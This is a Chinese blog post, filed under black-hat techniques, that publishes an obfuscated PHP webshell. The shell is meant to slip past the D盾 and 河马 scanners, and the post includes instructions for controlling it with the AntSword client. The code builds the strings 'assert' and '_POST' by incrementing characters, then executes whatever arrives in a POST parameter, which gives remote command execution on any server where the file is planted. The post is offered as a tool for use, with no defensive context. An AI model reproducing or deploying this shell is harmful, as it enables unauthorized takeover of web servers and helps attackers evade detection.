php免杀(过D盾、河马)绕assert eval post

作者:小俊 分类: 黑帽技术 发布于:2021-8-16 5:16 ė548次浏览 60条评论

php7.0以上不可使用
用蚁剑连接,选base64编码器
 

<?php #php 7.0以下可用 #密码 _POST   蚁剑 base64编码 class Foo {
    function Variable($c)     {
        $name = 'Bar';
        $b=$this->$name();
        echo $b;
        echo "</br>";
        echo $c;
        $b($c);

    }
    function Bar()     {
        $__='a';
        $a1=$__;
        $__++;$__++;$__++;$__++;
        $a2=$__;
        $__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;
        $a3=$__++;
        $a4=$__++;
        $a5=$__;
        $a=$a1.$a4.$a4.$a2.$a3.$a5;
        #        echo $a;         return $a;
    }
} function variable(){
    $_='A';
    $_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;
    $b1=$_++;
    $b2=$_;
    $_++;$_++;$_++;
    $b3=$_++;
    $b4=$_;
    $b='_'.$b2.$b1.$b3.$b4;
    return $b;
}


$foo = new Foo();
$funcname = "Variable";
$bb=${variable()}[variable()];
$foo->$funcname($bb); ?>


本文出自 小俊博客,转载时请注明出处及相应链接。

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部